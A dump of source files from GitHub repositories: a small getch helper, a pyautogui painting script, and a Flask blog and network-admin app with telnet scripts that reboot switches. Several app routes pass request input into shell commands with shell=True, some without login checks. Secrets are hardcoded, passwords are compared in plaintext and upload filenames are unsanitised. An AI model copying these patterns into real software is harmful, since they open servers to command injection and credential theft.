"path": "/GetCh.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "def _find_getch():\n try:\n import termios\n except ImportError:\n # Non - POSIX. Return msvcrt's (Windows')\n # getch.\n import msvcrt\n return msvcrt.getch\n\n # POSIX system. Create and\n # return a getch that\n # manipulates the tty.\n import sys, tty\n def _getch():\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(fd)\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd,termios.TCSADRAIN,old_settings)\n return ch\n\n return _getch\ngetch =_find_getch()\n"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 35,
"blob_id": "7ef7fe60bd5c373caf26fb1d03f82512389fa838",
"content_id": "c42df05895b4054b3047f62a352cb631422aec73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 72,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "###ReadMe\nAll codes are based on http://www.automatetheboringstuff.com\n"
},
{
"alpha_fraction": 0.5246511697769165,
"alphanum_fraction": 0.5720930099487305,
"avg_line_length": 25.875,
"blob_id": "de29a54d3e615d3402a1c120dd10d04eb42e11da",
"content_id": "e1f701d4b9ea15c6840417fcddf311e2776aa280",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1075,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 40,
"path": "/spiralPaint.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import pyautogui, time\nfrom selenium import webdriver\n\nmousePos = {\n \"1\" : (375, 179), \n \"2\" : (386, 242), \n \"3\" : (161, 185), \n \"4\" : (406, 483), \n }\ndef spiralPaint():\n dist = 200;\n de = 5;\n dur = 0.2;\n pyautogui.click()\n while dist>de * 5:\n pyautogui.dragRel(dist, 0, duration = dur);\n dist = dist - de\n pyautogui.dragRel(0, dist, duration = dur);\n dist = dist - de\n pyautogui.dragRel( - dist, 0, duration = dur);\n dist = dist - de\n pyautogui.dragRel(0, - dist, duration = dur);\n dist = dist - de\n\n#\npyautogui.PAUSE = 0.5\npyautogui.FAILSAFE = True\nf = webdriver.Firefox();\nf.maximize_window()\nf.get('http://www.speedpaint.info/');\ndur = 0.25\nprint(\"start painting....\");\ntime.sleep(2);\npyautogui.click( *mousePos[\"1\"], duration = dur);\npyautogui.click( *mousePos[\"2\"], duration = dur);\npyautogui.click( *mousePos[\"3\"], duration = dur);\npyautogui.typewrite(['1', '0']);\npyautogui.click( *mousePos[\"4\"], duration = dur);\n#pyautogui.moveTo();\nspiralPaint();\n"
}
] | 27 |
YatskoGrigoriy/MyFlaskBlog | https://github.com/YatskoGrigoriy/MyFlaskBlog | 0b12f58557e35abb91046721f107747b12c5db8a | c3e7a6adee7296d123c19d13bf2d70c362c4d1c9 | acceb0864db0f56c30f7b9511c09363f83f2b8d3 | refs/heads/master | 2021-06-30T20:20:14.777897 | 2020-03-11T16:17:15 | 2020-03-11T16:17:15 | 235,908,005 | 0 | 0 | null | 2020-01-23T23:38:39 | 2020-01-23T23:58:46 | 2020-01-23T23:59:07 | JavaScript | [
{
"alpha_fraction": 0.5171299576759338,
"alphanum_fraction": 0.7091144323348999,
"avg_line_length": 16.78160858154297,
"blob_id": "3f4a809efcbb119b57deea1bbb49b3f5e318be2b",
"content_id": "8462791f0f8cd7cf3f4723e866760ff4499fab56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1547,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 87,
"path": "/requirements.txt",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "aniso8601==8.0.0\nasn1crypto==0.24.0\nBabel==2.8.0\nbackports.functools-lru-cache==1.6.1\nbackports.shutil-get-terminal-size==1.0.0\nbcrypt==3.1.7\nblinker==1.4\ncertifi==2019.11.28\ncffi==1.13.2\nchardet==3.0.4\nClick==7.0\ncryptography==2.1.4\ncycler==0.10.0\nDateTime==4.3\ndecorator==4.1.2\ndicttoxml==1.7.4\nenum34==1.1.6\nFlask==1.0.3\nFlask-BabelEx==0.9.3\nflask-blueprint==1.3.0\nFlask-CKEditor==0.4.3\nFlask-Login==0.4.1\nFlask-Mail==0.9.1\nflask-marshmallow==0.10.1\nflask-paginate==0.5.5\nFlask-Principal==0.4.0\nFlask-Responses==0.2\nFlask-RESTful==0.3.8\nFlask-Security==3.0.0\nFlask-SQLAlchemy==2.4.1\nFlask-SSLify==0.1.5\nFlask-WTF==0.14.2\nfuture==0.17.1\ngunicorn==19.9.0\nhtml==1.16\nidna==2.8\nipaddress==1.0.17\nipython==5.5.0\nipython-genutils==0.2.0\nitsdangerous==1.1.0\nJinja2==2.10.1\nkeyring==10.6.0\nkeyrings.alt==3.0\nkiwisolver==1.1.0\nMarkupSafe==1.1.1\nmarshmallow==2.20.5\nmatplotlib==2.2.5\nmysql-connector-python==8.0.18\nnumpy==1.16.6\npasslib==1.7.2\npathlib2==2.3.0\npdfkit==0.6.1\npexpect==4.2.1\npickleshare==0.7.4\nply==3.11\nprompt-toolkit==1.0.15\nprotobuf==3.11.1\npyasn1==0.4.8\npycparser==2.19\npycrypto==2.6.1\npycryptodomex==3.9.4\nPygments==2.2.0\npygobject==3.26.1\nPyMySQL==0.9.3\npyparsing==2.4.6\npysmi==0.3.4\npysnmp==4.4.12\npython-dateutil==2.8.1\npytz==2019.3\npyxdg==0.25\nrequests==2.22.0\nscandir==1.7\nSecretStorage==2.3.1\nsimplegeneric==0.8.1\nsix==1.11.0\nspeaklater==1.3\nSQLAlchemy==1.3.11\nsubprocess32==3.5.4\ntk==0.1.0\ntraitlets==4.3.2\nurllib3==1.25.3\nviberbot==1.0.11\nvirtualenv==15.1.0\nwcwidth==0.1.7\nWerkzeug==0.15.4\nWTForms==2.2.1\nzope.interface==4.7.1\n"
},
{
"alpha_fraction": 0.7733563780784607,
"alphanum_fraction": 0.7768166065216064,
"avg_line_length": 27.75,
"blob_id": "d23ae47886ccff02bb3a2d6d1239ca556b351490",
"content_id": "feea23656340a3f57ee554d65b210f66f96fb9ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 578,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 20,
"path": "/app.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "from flask import Flask\nfrom config import Configuration\n\nfrom flask_sslify import SSLify\nfrom flask_wtf.csrf import CSRFProtect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_security import Security, SQLAlchemyUserDatastore\napp = Flask(__name__)\nsslify = SSLify(app)\napp.config.from_object(Configuration)\ndb = SQLAlchemy(app)\ncsrf = CSRFProtect(app)\n\n### db = app.config['SQLALCHEMY_DATABASE_URI']\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\n### Flask-security\n\nfrom models import *\nuser_datastore = SQLAlchemyUserDatastore(db, User, Role)\nsecurity = Security(app, user_datastore)\n\n\n\n"
},
{
"alpha_fraction": 0.6995708346366882,
"alphanum_fraction": 0.7038626670837402,
"avg_line_length": 57.25,
"blob_id": "9c2668255df2b94e0978129b1ae0240a8f0d43e3",
"content_id": "fe0223ef1db5de0b89df102d2ba1efacbf7aaf52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 4,
"path": "/run.sh",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n#PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games\nPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin\ncd /home/grin/generator/ && gunicorn -w 1 run:app\n"
},
{
"alpha_fraction": 0.4801536500453949,
"alphanum_fraction": 0.4827144742012024,
"avg_line_length": 18.9743595123291,
"blob_id": "9357ff4e6d18b76b2d788d6ad8686798f3118084",
"content_id": "25cd7e56caed6130043f690923397a8be2886a67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 781,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 39,
"path": "/scripts/RebootGroup.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport time\nimport re\nimport telnetlib\nimport pymysql.cursors\nimport pymysql\n\nuser = '***'\npassword = '***'\n\n\ntry:\n GROUP=(sys.argv[1])\nexcept:\n pass\n\n\ndef db():\n conn = ( pymysql.connect(host = '***',\n user = '***',\n password = '***',\n database = '***',\n charset='utf8' ) )\n\n cursor = conn.cursor()\n cursor.execute('SELECT equipment.ip FROM equipment WHERE equipment.`group` = %s',(GROUP))\n\n user = '***'\n password = '***'\n for data in cursor:\n host = ''.join(data)\n tn = telnetlib.Telnet(host)\n\n tn.write(user + '\\n')\n tn.write(password + '\\n')\n\n tn.write('reboot force_agree\\n')\ndb()\n\n\n"
},
{
"alpha_fraction": 0.48414984345436096,
"alphanum_fraction": 0.5043227672576904,
"avg_line_length": 17.70270347595215,
"blob_id": "f5f3fc1bda4a06a6bd84684bb6f2b9f97d0f2f0f",
"content_id": "d3aaa115fcb974c69b7a71c0b02e4d5f7f3a30f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 694,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 37,
"path": "/scripts/pon.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport time\nimport re\nimport telnetlib\n\nhost = '10.5.1.2'\n\nuser = '***'\npassword = '***'\n\n\ntry:\n ONU=(sys.argv[1])\n VLAN=(sys.argv[2])\nexcept:\n pass\n\ndef fun():\n\n try:\n tn = telnetlib.Telnet(host)\n tn.write(user + '\\r\\n')\n tn.write(password + '\\r\\n')\n tn.write('enable\\r\\n')\n tn.write('config\\r\\n')\n tn.write('vty output show-all\\r\\n')\n tn.write('interface epon 0/0\\r\\n')\n tn.write('ont modify 1' + ' ' + ONU + ' ' + 'ont-srvprofile-id ' + ' ' + VLAN + '\\r\\n')\n time.sleep(1)\n r4 = tn.read_very_eager().split('OLT')[6]\n print(r4)\n tn.close()\n except :\n pass\n\nfun()\n\n\n"
},
{
"alpha_fraction": 0.5479452013969421,
"alphanum_fraction": 0.551369845867157,
"avg_line_length": 15.166666984558105,
"blob_id": "d9e543512e59144067a535b3ba9d79d40e80f8d6",
"content_id": "2c1e5cb65ec98aaade4d2936046024a1cf8e2d9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 292,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 18,
"path": "/scripts/Reboot.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport telnetlib\n\nIP=(sys.argv[1])\n\ndef reboot(*args):\n user = '***'\n password = '***'\n\n for host in args:\n tn = telnetlib.Telnet(host)\n\n tn.write(user + '\\n')\n tn.write(password + '\\n')\n\n tn.write('reboot force_agree\\n')\nreboot(IP)\n\n"
},
{
"alpha_fraction": 0.6288330554962158,
"alphanum_fraction": 0.6322401762008667,
"avg_line_length": 24.5108699798584,
"blob_id": "7e351692395710bc35b0a1ac5936fee46791003d",
"content_id": "c33850ed77b0ff2293e976d12d4df3b83b1d7cf9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4696,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 184,
"path": "/blog/blueprint.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "import os\nfrom app import *\nfrom flask import Blueprint, render_template, request, url_for, send_from_directory, redirect, flash, jsonify\nfrom models import Post\nfrom sqlalchemy import asc, desc\nfrom flask_security import login_required\nfrom random import sample\n### Upload_files\n#from flask_ckeditor import CKEditor\nfrom werkzeug.utils import secure_filename\nPOSTS_PER_PAGE = 1\n\n\nposts = Blueprint('posts', __name__, static_folder='fstatic', template_folder='templates')\n\nALLOWED_EXTENSIONS = set(['ico','txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n\n\[email protected]('/imageuploader', methods=['GET','POST'])\ndef imageuploader():\n file = request.files.get('file')\n if file:\n filename = file.filename.lower()\n fn, ext = filename.split('.')\n if ext in ['jpg', 'pdf', 'gif', 'png', 'jpeg']:\n img_fullpath = os.path.join(app.config['BLOG_UPLOAD_FOLDER'], filename)\n # img_fullpath = app.config['BLOG_UPLOAD_FOLDER'] + filename\n print(img_fullpath)\n file.save(img_fullpath)\n return jsonify({'location' : filename})\n\n # fail, image did not upload\n output = make_response(404)\n output.headers['Error'] = 'Image failed to upload'\n return output\n\n\[email protected]('/<path:filename>')\[email protected]('/blog/<path:filename>')\ndef custom_static(filename):\n return send_from_directory('/home/grin/generator/blog/static/files', filename)\n #return send_from_directory(directory=app.config['UPLOAD_FOLDER'], filename=filename)\n\n\[email protected]('/chart')\ndef charts():\n\n return render_template('posts/chart.html')\n\n\[email protected]('/editor')\ndef editor():\n\n return render_template('posts/editor.html')\n\n\n\[email protected]('/data')\ndef data():\n\n return jsonify({'results' : sample(range(1,20),15)})\n\n\n\n\n\[email protected]('/')\ndef allp():\n q = request.args.get('g')\n\n page = request.args.get('page')\n if page and page.isdigit():\n page = int(page)\n else:\n page = 1\n if q:\n posts = Post.query.filter(Post.title.contains(q) | Post.body.contains(q))\n else:\n posts = Post.query.order_by(Post.created.desc())\n\n pages = posts.paginate(page=page, per_page=8)\n # article = Post.query.order_by(desc(Post.created)).paginate(page, POSTS_PER_PAGE, False).items\n\n return render_template('posts/all-posts.html', posts=posts, pages=pages )\n\n\n#Domofon\[email protected]('blog/phone')\ndef phone():\n\n domofon = Post.query.filter(Post.id == '159')\n return render_template('posts/domofon.html', title='Domofon', domofon=domofon)\n\n\n\[email protected]('blog/one-post=<int:id>',methods = ['GET', 'POST'])\n@login_required\ndef ps(id):\n articles = Post.query.filter(Post.id == id)\n\n return render_template('posts/posts.html', articles=articles )\n\n\n\n\[email protected]('/new-post')\ndef newp():\n return render_template('posts/new-post.html')\n\n\n\[email protected](\"/post-add\",methods = ['POST', 'GET'])\ndef padd():\n title = request.form.get('title')\n body = request.form.get('body')\n image = request.form.get('image')\n\n if request.method == 'POST':\n file = request.files['image']\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n p = Post(title=title,body=body,image=filename)\n db.session.add(p)\n db.session.commit()\n else:\n p = Post(title=title,body=body)\n db.session.add(p)\n db.session.commit()\n\n\n return redirect('/')\n\n\[email protected](\"/blog/edit-post=<int:id>\")\ndef editp(id):\n post = Post.query.filter(Post.id == id)\n return render_template('posts/edit-post.html',post=post)\n\n\n\n\n\n\n\[email protected](\"/blog/post-edit=<int:id>\", methods=['GET', 'POST'])\ndef pedit(id):\n post = Post.query.filter(Post.id == id).first()\n\n if request.method == 'POST':\n title = request.form.get('title')\n body = request.form.get('body')\n image = request.form.get('image')\n file = request.files['image']\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n post.image = filename\n else:\n filename = 'Nofile'\n post.title = title\n post.body = body\n db.session.commit()\n\n return redirect('/')\n\n\n\n\n\[email protected](\"/blog/delete-post=<int:id>\")\n@login_required\ndef deletep(id):\n p = Post.query.filter(Post.id == id).delete()\n db.session.commit()\n return redirect('/')\n\n\n"
},
{
"alpha_fraction": 0.6505494713783264,
"alphanum_fraction": 0.6659340858459473,
"avg_line_length": 29.066667556762695,
"blob_id": "5659510394daa5f4e74e5bf7b83828bc72f44a34",
"content_id": "8e21c0e2b5e53d32dc4c37ae10d8c7140815d4b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 455,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 15,
"path": "/config.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "class Configuration(object):\n DEBUG = True\n UPLOAD_FOLDER = '/home/grin/generator/static/img/blogimgage'\n BLOG_UPLOAD_FOLDER = '/home/grin/generator/blog/static/files/'\n# MYSQL_DATABASE_CHARSET = 'utf8mb4'\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n SQLALCHEMY_DATABASE_URI = '***'\n SECRET_KEY = '12345'\n\n ### Flask-security\n\n SECURITY_PASSWORD_SALT = 'salt'\n SECURITY_PASSWORD_HASH = 'sha256_crypt'\n\n ### Pagination\n \n"
},
{
"alpha_fraction": 0.5934579372406006,
"alphanum_fraction": 0.605140209197998,
"avg_line_length": 17.565217971801758,
"blob_id": "48cf8ad30ba5ac1e048ba1064425a6c4bd11af32",
"content_id": "03b4aa1d59107416cbf0041340a52a78a87185c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 428,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 23,
"path": "/scripts/command.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport time\nimport telnetlib\n\nIP=(sys.argv[1])\nCOMMAND=str((sys.argv[2]))\nprint(COMMAND)\n\ndef vg(*args):\n user = '***'\n password = '***'\n tn = telnetlib.Telnet(IP)\n tn.write(user + '\\n')\n tn.write(password + '\\n')\n tn.write('disable clipaging\\n')\n tn.write(COMMAND + '\\n')\n time.sleep(25)\n all_result = tn.read_very_eager().decode('utf-8')\n print(all_result)\n\n\nvg(IP,COMMAND)\n\n"
},
{
"alpha_fraction": 0.5594294667243958,
"alphanum_fraction": 0.580824077129364,
"avg_line_length": 21.105262756347656,
"blob_id": "416fd49356b05a77e86ac050c0243c8b205db36e",
"content_id": "a17ff8eb486fb9871862721f353aefceacbe2e61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1262,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 57,
"path": "/scripts/olt.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport time\nimport re\nimport telnetlib\n\nhost = '10.5.1.2'\nuser = '***'\npassword = '***'\n\ntry:\n PORT=(sys.argv[1])\nexcept:\n pass\n\n\ndef optical():\n\n tn = telnetlib.Telnet(host)\n tn.write(user + '\\r\\n')\n tn.write(password + '\\r\\n')\n tn.write('enable\\r\\n')\n tn.write('config\\r\\n')\n tn.write('vty output show-all\\r\\n')\n tn.write('interface epon 0/0\\r\\n')\n tn.write('show ont optical-info 1 all\\r\\n')\n time.sleep(1)\n r1 = tn.read_very_eager().split('OLT')[6]\n print(r1)\n tn.close()\n\n tn = telnetlib.Telnet(host)\n tn.write(user + '\\r\\n')\n tn.write(password + '\\r\\n')\n tn.write('enable\\r\\n')\n tn.write('config\\r\\n')\n tn.write('vty output show-all\\r\\n')\n tn.write('interface epon 0/0\\r\\n')\n tn.write('show ont info 1 all\\r\\n')\n time.sleep(1)\n r2 = tn.read_very_eager().split('OLT')[6]\n print(r2)\n tn.close()\n\n tn = telnetlib.Telnet(host)\n tn.write(user + '\\r\\n')\n tn.write(password + '\\r\\n')\n tn.write('enable\\r\\n')\n tn.write('config\\r\\n')\n tn.write('vty output show-all\\r\\n')\n tn.write('show mac-address port epon 0/0/1 with-ont-location\\r\\n')\n time.sleep(1)\n r3 = tn.read_very_eager().split('OLT')[5]\n print(r3)\n tn.close()\n\noptical()\n\n\n"
},
{
"alpha_fraction": 0.6683416962623596,
"alphanum_fraction": 0.6884422302246094,
"avg_line_length": 14.230769157409668,
"blob_id": "5fa77b58a72063a9237d3227722d9c1af76b9b49",
"content_id": "2691623af5f13f4015a8aca342462003a6eba0ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 199,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 13,
"path": "/run.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "from app import app\nfrom app import db\nfrom blog.blueprint import posts\n\nimport views\n\n### Blueprint\n\napp.register_blueprint(posts, url_prefix='/')\n\n\nif __name__=='__main__':\n app.run(port=8000)\n\n"
},
{
"alpha_fraction": 0.5908962488174438,
"alphanum_fraction": 0.594846248626709,
"avg_line_length": 26.191816329956055,
"blob_id": "31febd81ef08e28053ada1d0e5d5973b4aea4160",
"content_id": "5361cd91f85404e064279f66c9ced936b568a997",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10633,
"license_type": "no_license",
"max_line_length": 170,
"num_lines": 391,
"path": "/views.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport subprocess\nimport telnetlib\n#from app import *\nfrom app import app\nfrom app import db\nfrom flask import render_template, request, flash, session, url_for, redirect, make_response, jsonify\nimport pdfkit\n#from flask import send_file, send_from_directory, safe_join, abort, jsonify\nimport pymysql.cursors\nimport pymysql\nfrom models import User, SwInfo, VlanInfo\nfrom flask_security import login_required\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\[email protected](\"/login\",methods = ['POST', 'GET'])\ndef login():\n login = request.form.get('login')\n password = request.form.get('password')\n\n user = User.query.filter_by(login=login, password=password).first()\n if not user:\n flash('Please enter correct data')\n return render_template('login.html')\n return render_template('index.html')\n\n\n\[email protected](\"/shell\",methods = ['POST', 'GET'])\n@login_required\ndef shell():\n return render_template('shell.html')\n\n\n\n\n\[email protected](\"/vagrant\",methods = ['POST', 'GET'])\n@login_required\ndef vagrant():\n ip = request.form.get('ip')\n command = request.form.get('command')\n command_success = 'python scripts/command.py'+' ' + str(ip) + ' ' + '\"' + command + '\"'\n result = subprocess.check_output(\n [command_success], shell=True)\n print(result)\n return render_template('top.html', result=result)\n\n\[email protected](\"/shelline\",methods = ['POST', 'GET'])\n@login_required\ndef shelline():\n return redirect('https://185.190.150.10:8085/')\n\n\n\n\[email protected](\"/graff\",methods = ['POST', 'GET'])\ndef graff():\n\n rng = np.arange(50)\n rnd = np.random.randint(0, 10, size=(3, rng.size))\n yrs = 1950 + rng\n\n fig, ax = plt.subplots(figsize=(5, 3))\n ax.stackplot(yrs, rng + rnd, labels=['Eastasia', 'Eurasia', 'Oceania'])\n ax.set_title('Combined debt growth over time')\n ax.legend(loc='upper left')\n ax.set_ylabel('Total debt')\n ax.set_xlim(xmin=yrs[0], xmax=yrs[-1])\n fig.tight_layout()\n\n render_template('graff.html', result=plt.show())\n\n\n\n\n#Reboot\[email protected]('/reboot',methods = ['POST', 'GET'])\n@login_required\ndef reboot():\n conn = ( pymysql.connect(host = '***',\n user = '***',\n password = '***',\n database = '***',\n charset='utf8' ) )\n\n cursor = conn.cursor()\n mySql_select_Query = '''SELECT * FROM `equipment_group` ORDER BY `name`'''\n cursor.execute(mySql_select_Query)\n\n\n return render_template('REBOOT/reboot.html', title='Reboot', cursor=cursor)\n cursor.close()\n conn.close()\n\n\[email protected]('/reboot/action/group',methods = ['POST','GET'])\ndef rebootaction():\n branch = request.args.get('branch')\n\n try:\n if len(branch):\n flash('Branch Successfully Reboot')\n command_success = 'python scripts/RebootGroup.py' + ' ' + str(branch) \n result = subprocess.check_output(\n [command_success], shell=True)\n except:\n pass\n\n return redirect(url_for('reboot'))\n\n\n\[email protected]('/reboot/action/one',methods = ['POST','GET'])\ndef rebootactionone():\n ip = request.args.get('ip')\n\n try:\n if len(ip):\n flash('Switch Successfully Reboot')\n command_success = 'python scripts/Reboot.py' + ' ' + str(ip)\n result = subprocess.check_output(\n [command_success], shell=True)\n except:\n pass\n\n return redirect(url_for('reboot'))\n\n\n\n\n#Ajax\[email protected]('/ajax',methods = ['POST','GET'])\ndef ajax():\n\n return render_template('AJAX/ajax.html', title='Ajax')\n\n\n\n\n\n#Resume\[email protected]('/summary')\ndef resume():\n\n return render_template('RESUME/resume.html', title='Resume')\n\n\[email protected]('/summary/pdf')\ndef pdf():\n rendered = render_template('test.html')\n pdf = pdfkit.from_string(rendered,False)\n response = make_response(pdf)\n response.headers['Content-Type'] ='application/pdf'\n response.headers['Content-Disposition'] ='attachment; filename=output.pdf'\n\n return response\n\n\n\n#Generator\[email protected]('/generator')\n@login_required\ndef config():\n\n return render_template('config.html', title='Generator')\n\n\n\[email protected]('/get-config', methods = ['POST'])\n@login_required\ndef getconfig():\n vlanext = request.form.get('vlanext')\n vlanextid = request.form.get('vlanextid')\n vlannat = request.form.get('vlannat')\n vlannatid = request.form.get('vlannatid')\n vlanfake = request.form.get('vlanfake')\n vlanfakeid = request.form.get('vlanfakeid')\n vlansw = request.form.get('vlansw')\n vlanswid = request.form.get('vlanswid')\n ip = request.form.get('ip')\n gateway = ip[:6]+'.1'\n return render_template('get-config.html',vlanext=vlanext, vlanextid=vlanextid, \n vlannat=vlannat, vlannatid=vlannatid, vlanfake=vlanfake ,\n vlanfakeid=vlanfakeid, vlansw=vlansw, vlanswid=vlanswid, ip=ip, gateway=gateway)\n\n\n\[email protected]('/vlan-list')\n@login_required\ndef vlanlist():\n conn = ( pymysql.connect(host = '***',\n user = '***',\n password = '***',\n database = '***',\n charset='utf8' ) )\n\n cursor = conn.cursor()\n mySql_select_Query = '''SELECT h.id\n , k.name type\n , h.name\n , h.startIp\n , h.stopIp\n , h.gateway\n , h.mask\n , vl.vlan vlans\n ,(SELECT count(*) FROM eq_bindings WHERE INET_ATON(ip) BETWEEN INET_ATON(startIp) and INET_ATON(stopIp)) bindings\n FROM `eq_neth` h\n JOIN eq_kinds k on k.id = h.type\n LEFT JOIN (SELECT GROUP_CONCAT(vl.vlan) vlan, neth FROM eq_vlan_neth n JOIN eq_vlans vl on vl.id = n.vlan GROUP BY neth) vl on vl.neth = h.id\n ORDER by 2,4'''\n cursor.execute(mySql_select_Query)\n return render_template('vlan-list.html', cursor=cursor)\n cursor.close()\n conn.close()\n\n\[email protected](\"/get-image/<image_name>\")\ndef get_image(image_name):\n\n try:\n return send_from_directory(app.config[\"FILE_STORAGE\"], filename=image_name, as_attachment=True)\n except FileNotFoundError:\n abort(404)\n\n#SWITCH_INFO\n\[email protected](\"/switch-info\" ,methods = ['POST', 'GET'])\ndef swinfo():\n sw = SwInfo.query.all()\n return render_template('SW_INFO/switch-info.html',sw=sw)\n\n\n\[email protected](\"/switch-add/new\",methods = ['POST', 'GET'])\n@login_required\ndef swnew():\n\n return render_template('SW_INFO/switch-add-new.html')\n\n\n\n\[email protected](\"/switch-add\",methods = ['POST', 'GET'])\n@login_required\ndef swadd():\n\n sw = request.form.get('sw')\n ip = request.form.get('ip')\n location = request.form.get('location')\n presence = request.form.get('presence')\n fvlan = request.form.get('fvlan')\n model = request.form.get('model')\n\n s = SwInfo(sw=sw, ip=ip, location=location, presence=presence, fixed_vlan=fvlan, model=model)\n db.session.add(s)\n db.session.commit()\n return redirect(url_for('swinfo'))\n\n\[email protected](\"/switch-edit=<int:id>\",methods = ['POST', 'GET'])\n@login_required\ndef swedit(id):\n switches = SwInfo.query.filter(SwInfo.id == id)\n return render_template('SW_INFO/switch-edit.html',switches=switches)\n\n\[email protected](\"/switch-update\",methods = ['POST', 'GET'])\n@login_required\ndef swupdate():\n\n if request.method == 'POST':\n id = request.form.get('id')\n sw = request.form.get('sw')\n ip = request.form.get('ip')\n location = request.form.get('location')\n presence = request.form.get('presence')\n fvlan = request.form.get('fvlan')\n model = request.form.get('model')\n\n s = SwInfo.query.filter(SwInfo.id == id).first()\n s.sw = sw\n s.ip = ip\n s.location = location\n s.presence = presence\n s.fixed_vlan = fvlan\n s.model = model\n db.session.commit()\n\n return redirect(url_for('swinfo'))\n\n#VLAN_INFO\n\[email protected](\"/switch-vlan\" ,methods = ['POST', 'GET'])\ndef vinfo():\n vlan = VlanInfo.query.all()\n return render_template('VLAN_INFO/switch-vlan.html',vlan=vlan)\n\n\[email protected](\"/switch-vlan/new\" ,methods = ['POST', 'GET'])\ndef vnew():\n\n return render_template('VLAN_INFO/switch-vlan-new.html')\n\[email protected](\"/switch-vlan/add\" ,methods = ['POST', 'GET'])\ndef vadd():\n\n if request.method == 'POST':\n vlanid = request.form.get('vlanid')\n vlanname = request.form.get('vlanname')\n network = request.form.get('network')\n group = request.form.get('group')\n desc = request.form.get('desc')\n \n v = VlanInfo(vlanid=vlanid, vlanname=vlanname, network=network, group=group, desc=desc)\n db.session.add(v)\n db.session.commit()\n\n\n return redirect(url_for('vinfo'))\n\n\[email protected](\"/vlan-edit=<int:id>\",methods = ['POST', 'GET'])\n@login_required\ndef vedit(id):\n vlan = VlanInfo.query.filter(VlanInfo.id == id)\n return render_template('VLAN_INFO/switch-vlan-edit.html',vlan=vlan)\n\n\n\[email protected](\"/switch-vlan/edit\",methods = ['POST', 'GET'])\n@login_required\ndef vupdate():\n\n if request.method == 'POST':\n id = request.form.get('id')\n vlanid = request.form.get('vlanid')\n vlanname = request.form.get('vlanname')\n network = 